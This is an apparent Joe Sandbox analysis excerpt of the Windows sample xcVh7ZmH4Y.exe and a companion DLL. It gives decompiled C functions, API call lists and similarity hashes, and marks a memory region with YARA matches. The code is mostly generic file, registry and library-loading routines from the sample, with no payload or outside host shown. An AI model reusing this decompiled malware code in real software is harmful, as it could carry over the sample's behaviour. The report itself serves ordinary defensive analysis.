                                                                                      				}
                                                                                      				return 0;
                                                                                      			}












                                                                                      APIs
                                                                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                      • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID:
                                                                                      • API String ID: 3850602802-0
                                                                                      • Opcode ID: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
                                                                                      • Instruction ID: f98c5e72cab4da6dd47fcf147c12dc0649e5852bd482257a86ca63d172a8b8d6
                                                                                      • Opcode Fuzzy Hash: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
                                                                                      • Instruction Fuzzy Hash: 0B01F4316202209FE7094B389D05B6A3698E710319F14823FF851F65F1EA78DC029B4C
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • ShowWindow.USER32(00000000,00000000), ref: 00401EFC
                                                                                      • EnableWindow.USER32(00000000,00000000), ref: 00401F07
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$EnableShow
                                                                                      • String ID:
                                                                                      • API String ID: 1136574915-0
                                                                                      • Opcode ID: dc6c04349ba6d228002943a8c0baf5b02fcea73b120ed6c720f8467004a60d34
                                                                                      • Instruction ID: ff95e9915c8c9942b49c08d49a5710ecdabad47c7be9b03b7ba0a01474a23479
                                                                                      • Opcode Fuzzy Hash: dc6c04349ba6d228002943a8c0baf5b02fcea73b120ed6c720f8467004a60d34
                                                                                      • Instruction Fuzzy Hash: E7E04872908211CFE705EBA4EE495AD77F4EF40325710497FE501F11D1DBB55D00965D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E0040690A(signed int _a4) {
                                                                                      				struct HINSTANCE__* _t5;
                                                                                      				signed int _t10;
                                                                                      
                                                                                      				_t10 = _a4 << 3;
                                                                                      				_t8 =  *(_t10 + 0x40a3e0);
                                                                                      				_t5 = GetModuleHandleA( *(_t10 + 0x40a3e0));
                                                                                      				if(_t5 != 0) {
                                                                                      					L2:
                                                                                      					return GetProcAddress(_t5,  *(_t10 + 0x40a3e4));
                                                                                      				}
                                                                                      				_t5 = E0040689A(_t8); // executed
                                                                                      				if(_t5 == 0) {
                                                                                      					return 0;
                                                                                      				}
                                                                                      				goto L2;
                                                                                      			}






                                                                                      APIs
                                                                                      • GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00406937
                                                                                        • Part of subcall function 0040689A: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
                                                                                        • Part of subcall function 0040689A: wsprintfW.USER32 ref: 004068EC
                                                                                        • Part of subcall function 0040689A: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                      • String ID:
                                                                                      • API String ID: 2547128583-0
                                                                                      • Opcode ID: 6f78d3fdf53352f122fdb8e7e1f438bdfac4fae158339a91a146711bf240c1a4
                                                                                      • Instruction ID: 98bdf7d71c6046f852b78b75196177710d0a141037308efd39b2ac7baa162fea
                                                                                      • Opcode Fuzzy Hash: 6f78d3fdf53352f122fdb8e7e1f438bdfac4fae158339a91a146711bf240c1a4
                                                                                      • Instruction Fuzzy Hash: 9FE0867390422066D21196745D44D7773A89B99750306443EF946F2090DB38DC31A76E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 68%
                                                                                      			E0040602D(WCHAR* _a4, long _a8, long _a12) {
                                                                                      				signed int _t5;
                                                                                      				void* _t6;
                                                                                      
                                                                                      				_t5 = GetFileAttributesW(_a4); // executed
                                                                                      				asm("sbb ecx, ecx");
                                                                                      				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                                                                      				return _t6;
                                                                                      			}






                                                                                      APIs
                                                                                      • GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\xcVh7ZmH4Y.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                                                                      • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$AttributesCreate
                                                                                      • String ID:
                                                                                      • API String ID: 415043291-0
                                                                                      • Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                                                      • Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
                                                                                      • Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                                                      • Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00406008(WCHAR* _a4) {
                                                                                      				signed char _t3;
                                                                                      				signed char _t7;
                                                                                      
                                                                                      				_t3 = GetFileAttributesW(_a4); // executed
                                                                                      				_t7 = _t3;
                                                                                      				if(_t7 != 0xffffffff) {
                                                                                      					SetFileAttributesW(_a4, _t3 & 0x000000fe);
                                                                                      				}
                                                                                      				return _t7;
                                                                                      			}






                                                                                      APIs
                                                                                      • GetFileAttributesW.KERNELBASE(?,?,00405C0D,?,?,00000000,00405DE3,?,?,?,?), ref: 0040600D
                                                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 00406021
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: AttributesFile
                                                                                      • String ID:
                                                                                      • API String ID: 3188754299-0
                                                                                      • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                      • Instruction ID: c979a2e86073268fb5c10017c0603d576bb262e7e1663e1e1b2ee048d1a5e24b
                                                                                      • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                      • Instruction Fuzzy Hash: 34D012725041316FC2102728EF0C89BBF55EF643717014B35F9A5A22F0CB304C638A98
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00405AEB(WCHAR* _a4) {
                                                                                      				int _t2;
                                                                                      
                                                                                      				_t2 = CreateDirectoryW(_a4, 0); // executed
                                                                                      				if(_t2 == 0) {
                                                                                      					return GetLastError();
                                                                                      				}
                                                                                      				return 0;
                                                                                      			}





                                                                                      APIs
                                                                                      • CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1
                                                                                      • GetLastError.KERNEL32 ref: 00405AFF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateDirectoryErrorLast
                                                                                      • String ID:
                                                                                      • API String ID: 1375471231-0
                                                                                      • Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                                                      • Instruction ID: 33feed20cbbf131019f18849f7ccc9358209a8d33535326e0157453b6049084a
                                                                                      • Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                                                      • Instruction Fuzzy Hash: 1BC04C30204501AED6105B609E48B177AA4DB50741F16843D6146E41E0DA789455EE2D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 19%
                                                                                      			E71032B98(void* __ecx, intOrPtr _a4) {
                                                                                      				signed int _v8;
                                                                                      				void* _t28;
                                                                                      				void* _t29;
                                                                                      				void* _t33;
                                                                                      				void* _t37;
                                                                                      				void* _t40;
                                                                                      				void* _t45;
                                                                                      				void* _t49;
                                                                                      				signed int _t56;
                                                                                      				void* _t61;
                                                                                      				void* _t70;
                                                                                      				intOrPtr _t72;
                                                                                      				signed int _t77;
                                                                                      				intOrPtr _t79;
                                                                                      				intOrPtr _t80;
                                                                                      				void* _t81;
                                                                                      				void* _t87;
                                                                                      				void* _t88;
                                                                                      				void* _t89;
                                                                                      				void* _t90;
                                                                                      				intOrPtr _t93;
                                                                                      				intOrPtr _t94;
                                                                                      
                                                                                      				if( *0x71035050 != 0 && E71032ADB(_a4) == 0) {
                                                                                      					 *0x71035054 = _t93;
                                                                                      					if( *0x7103504c != 0) {
                                                                                      						_t93 =  *0x7103504c;
                                                                                      					} else {
                                                                                      						E710330C0(E71032AD5(), __ecx);
                                                                                      						 *0x7103504c = _t93;
                                                                                      					}
                                                                                      				}
                                                                                      				_t28 = E71032B09(_a4);
                                                                                      				_t94 = _t93 + 4;
                                                                                      				if(_t28 <= 0) {
                                                                                      					L9:
                                                                                      					_t29 = E71032AFD();
                                                                                      					_t72 = _a4;
                                                                                      					_t79 =  *0x71035058;
                                                                                      					 *((intOrPtr*)(_t29 + _t72)) = _t79;
                                                                                      					 *0x71035058 = _t72;
                                                                                      					E71032AF7();
                                                                                      					_t33 = CreateFileA(??, ??, ??, ??, ??, ??, ??); // executed
                                                                                      					 *0x71035034 = _t33;
                                                                                      					 *0x71035038 = _t79;
                                                                                      					if( *0x71035050 != 0 && E71032ADB( *0x71035058) == 0) {
                                                                                      						 *0x7103504c = _t94;
                                                                                      						_t94 =  *0x71035054;
                                                                                      					}
                                                                                      					_t80 =  *0x71035058;
                                                                                      					_a4 = _t80;
                                                                                      					 *0x71035058 =  *((intOrPtr*)(E71032AFD() + _t80));
                                                                                      					_t37 = E71032AE9(_t80);
                                                                                      					_pop(_t81);
                                                                                      					if(_t37 != 0) {
                                                                                      						_t40 = E71032B09(_t81);
                                                                                      						if(_t40 > 0) {
                                                                                      							_push(_t40);
                                                                                      							_push(E71032B14() + _a4 + _v8);
                                                                                      							_push(E71032B1E());
                                                                                      							if( *0x71035050 <= 0 || E71032ADB(_a4) != 0) {
                                                                                      								_pop(_t88);
                                                                                      								_pop(_t45);
                                                                                      								__eflags =  *((intOrPtr*)(_t88 + _t45)) - 2;
                                                                                      								if(__eflags == 0) {
                                                                                      								}
                                                                                      								asm("loop 0xfffffff5");
                                                                                      							} else {
                                                                                      								_pop(_t89);
                                                                                      								_pop(_t49);
                                                                                      								 *0x7103504c =  *0x7103504c +  *(_t89 + _t49) * 4;
                                                                                      								asm("loop 0xffffffeb");
                                                                                      							}
                                                                                      						}
                                                                                      					}
                                                                                      					_t107 =  *0x71035058;
                                                                                      					if( *0x71035058 == 0) {
                                                                                      						 *0x7103504c = 0;
                                                                                      					}
                                                                                      					E71032B42(_t107, _a4,  *0x71035034,  *0x71035038);
                                                                                      					return _a4;
                                                                                      				}
                                                                                      				_push(E71032B14() + _a4);
                                                                                      				_t56 = E71032B1A();
                                                                                      				_v8 = _t56;
                                                                                      				_t77 = _t28;
                                                                                      				_push(_t68 + _t56 * _t77);
                                                                                      				_t70 = E71032B26();
                                                                                      				_t87 = E71032B22();
                                                                                      				_t90 = E71032B1E();
                                                                                      				_t61 = _t77;
                                                                                      				if( *((intOrPtr*)(_t90 + _t61)) == 2) {
                                                                                      					_push( *((intOrPtr*)(_t70 + _t61)));
                                                                                      				}
                                                                                      				_push( *((intOrPtr*)(_t87 + _t61)));
                                                                                      				asm("loop 0xfffffff1");
                                                                                      				goto L9;
                                                                                      			}

























                                                                                      0x71032c20
                                                                                      0x71032c25
                                                                                      0x71032c27
                                                                                      0x71032c27
                                                                                      0x71032c2a
                                                                                      0x71032c30
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • CreateFileA.KERNEL32(00000000), ref: 71032C57
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26231651771.0000000071031000.00000020.00000001.01000000.00000004.sdmp, Offset: 71030000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26231597486.0000000071030000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.26231722184.0000000071034000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.26231774806.0000000071036000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_71030000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateFile
                                                                                      • String ID:
                                                                                      • API String ID: 823142352-0
                                                                                      • Opcode ID: 2ce687fed797dbb9ada7017ad28d122b2173d12d61e7d99f2c19f8699f61d2a2
                                                                                      • Instruction ID: 2677044735a4b2627c74ca59847cef50c1d91897fa61e09f0fd1e6889ba7b991
                                                                                      • Opcode Fuzzy Hash: 2ce687fed797dbb9ada7017ad28d122b2173d12d61e7d99f2c19f8699f61d2a2
                                                                                      • Instruction Fuzzy Hash: 7641A072508209EFDB169FB6D984B4DBBB5EB84B10FB0886EF505C6120D73AA4858F90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CreateFile
                                                                                      • String ID:
                                                                                      • API String ID: 823142352-0
                                                                                      • Opcode ID: 311f3afab1036db68cfba640eb14c027b20115fab6d425a429687b66cee5c4f2
                                                                                      • Instruction ID: 49476ce71fe0146965cda56497aee1e32c6acd28533bea7f3810d991623b494e
                                                                                      • Opcode Fuzzy Hash: 311f3afab1036db68cfba640eb14c027b20115fab6d425a429687b66cee5c4f2
                                                                                      • Instruction Fuzzy Hash: A231F072348325CBDB286D2C8DA57FA62E1AF112C0F52005FAF8B83A41D3715A85C713
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • LoadLibraryA.KERNEL32(?,?,?,02F45CD3,-213C6C70,02F52D38,00000000), ref: 02F54889
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad
                                                                                      • String ID:
                                                                                      • API String ID: 1029625771-0
                                                                                      • Opcode ID: ec58151028f8efc65b837dbaabe370210b2bbed7ae06ecbb8102c61d99e6380b
                                                                                      • Instruction ID: 070ee565a855ab42347d3e4b5335cecab1d7b4a47e6008109f641d56baa64ffc
                                                                                      • Opcode Fuzzy Hash: ec58151028f8efc65b837dbaabe370210b2bbed7ae06ecbb8102c61d99e6380b
                                                                                      • Instruction Fuzzy Hash: 6F01F571A012B8AFDF349F188D147DE369ABF5A760F01421BED49EB204C3B08A81CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • LoadLibraryA.KERNEL32(?,?,?,02F45CD3,-213C6C70,02F52D38,00000000), ref: 02F54889
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad
                                                                                      • String ID:
                                                                                      • API String ID: 1029625771-0
                                                                                      • Opcode ID: aabdc0ce207b83f044765bec8ea6822e92b000eec4c2b97cd7408d46fbbed137
                                                                                      • Instruction ID: 766cdfbe7eec3d107d73c13f5f5f26b8061c552fecc67db7d8a4f92028029c7a
                                                                                      • Opcode Fuzzy Hash: aabdc0ce207b83f044765bec8ea6822e92b000eec4c2b97cd7408d46fbbed137
                                                                                      • Instruction Fuzzy Hash: 4601A271A452F89BDF349F288C047DA36A5AF5A761F05421BED19EB204C3B04A41CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E004023B2(int __eax, WCHAR* __ebx) {
                                                                                      				WCHAR* _t11;
                                                                                      				WCHAR* _t13;
                                                                                      				void* _t17;
                                                                                      				int _t21;
                                                                                      
                                                                                      				_t11 = __ebx;
                                                                                      				_t5 = __eax;
                                                                                      				_t13 = 0;
                                                                                      				if(__eax != __ebx) {
                                                                                      					__eax = E00402DA6(__ebx);
                                                                                      				}
                                                                                      				if( *((intOrPtr*)(_t17 - 0x2c)) != _t11) {
                                                                                      					_t13 = E00402DA6(0x11);
                                                                                      				}
                                                                                      				if( *((intOrPtr*)(_t17 - 0x20)) != _t11) {
                                                                                      					_t11 = E00402DA6(0x22);
                                                                                      				}
                                                                                      				_t5 = WritePrivateProfileStringW(0, _t13, _t11, E00402DA6(0xffffffcd)); // executed
                                                                                      				_t21 = _t5;
                                                                                      				if(_t21 == 0) {
                                                                                      					 *((intOrPtr*)(_t17 - 4)) = 1;
                                                                                      				}
                                                                                      				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t17 - 4));
                                                                                      				return 0;
                                                                                      			}








                                                                                      APIs
                                                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004023E9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: PrivateProfileStringWrite
                                                                                      • String ID:
                                                                                      • API String ID: 390214022-0
                                                                                      • Opcode ID: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
                                                                                      • Instruction ID: de4cb5ca612a6b97b91745c8380e1d92b079ec7b797fcdaf288f77766e75fad7
                                                                                      • Opcode Fuzzy Hash: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
                                                                                      • Instruction Fuzzy Hash: FAE04F31900124BBDF603AB11F8DEAE205C6FC6744B18013EF911BA1C2E9FC8C4146AD
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E004063D8(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
                                                                                      				void* _t7;
                                                                                      				long _t8;
                                                                                      				void* _t9;
                                                                                      
                                                                                      				_t7 = E00406329(_a4,  &_a12);
                                                                                      				if(_t7 != 0) {
                                                                                      					_t8 = RegCreateKeyExW(_t7, _a8, 0, 0, 0, _a12, 0, _a16, 0); // executed
                                                                                      					return _t8;
                                                                                      				}
                                                                                      				_t9 = 6;
                                                                                      				return _t9;
                                                                                      			}







                                                                                      APIs
                                                                                      • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E57,00000000,?,?), ref: 00406401
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: Create
                                                                                      • String ID:
                                                                                      • API String ID: 2289755597-0
                                                                                      • Opcode ID: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
                                                                                      • Instruction ID: ccab944935cfefb85f0e849ce69279fb55db75a3b7fb0960311cd9d36817041a
                                                                                      • Opcode Fuzzy Hash: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
                                                                                      • Instruction Fuzzy Hash: 04E0E6B2010109BFEF095F90DC0AD7B3B1DE704300F01892EFD06D4091E6B5AD306675
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E004060DF(void* _a4, void* _a8, long _a12) {
                                                                                      				int _t7;
                                                                                      				long _t11;
                                                                                      
                                                                                      				_t11 = _a12;
                                                                                      				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                                                      				if(_t7 == 0 || _t11 != _a12) {
                                                                                      					return 0;
                                                                                      				} else {
                                                                                      					return 1;
                                                                                      				}
                                                                                      			}






                                                                                      APIs
                                                                                      • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403498,00000000,0041EA20,000000FF,0041EA20,000000FF,000000FF,00000004,00000000), ref: 004060F3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileWrite
                                                                                      • String ID:
                                                                                      • API String ID: 3934441357-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E004060B0(void* _a4, void* _a8, long _a12) {
                                                                                      				int _t7;
                                                                                      				long _t11;
                                                                                      
                                                                                      				_t11 = _a12;
                                                                                      				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                                                      				if(_t7 == 0 || _t11 != _a12) {
                                                                                      					return 0;
                                                                                      				} else {
                                                                                      					return 1;
                                                                                      				}
                                                                                      			}






                                                                                      APIs
                                                                                      • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034E2,00000000,00000000,00403306,000000FF,00000004,00000000,00000000,00000000), ref: 004060C4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileRead
                                                                                      • String ID:
                                                                                      • API String ID: 2738559852-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                                                                      
                                                                                      				 *0x71035048 = _a4;
                                                                                      				if(_a8 == 1) {
                                                                                      					VirtualProtect(0x7103505c, 4, 0x40, 0x7103504c); // executed
                                                                                      					 *0x7103505c = 0xc2;
                                                                                      					 *0x7103504c = 0;
                                                                                      					 *0x71035054 = 0;
                                                                                      					 *0x71035068 = 0;
                                                                                      					 *0x71035058 = 0;
                                                                                      					 *0x71035050 = 0;
                                                                                      					 *0x71035060 = 0;
                                                                                      					 *0x7103505e = 0;
                                                                                      				}
                                                                                      				return 1;
                                                                                      			}




                                                                                      APIs
                                                                                      • VirtualProtect.KERNEL32(7103505C,00000004,00000040,7103504C), ref: 71032A9D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26231651771.0000000071031000.00000020.00000001.01000000.00000004.sdmp, Offset: 71030000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_71030000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: ProtectVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 544645111-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E004063AA(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
                                                                                      				void* _t7;
                                                                                      				long _t8;
                                                                                      				void* _t9;
                                                                                      
                                                                                      				_t7 = E00406329(_a4,  &_a12);
                                                                                      				if(_t7 != 0) {
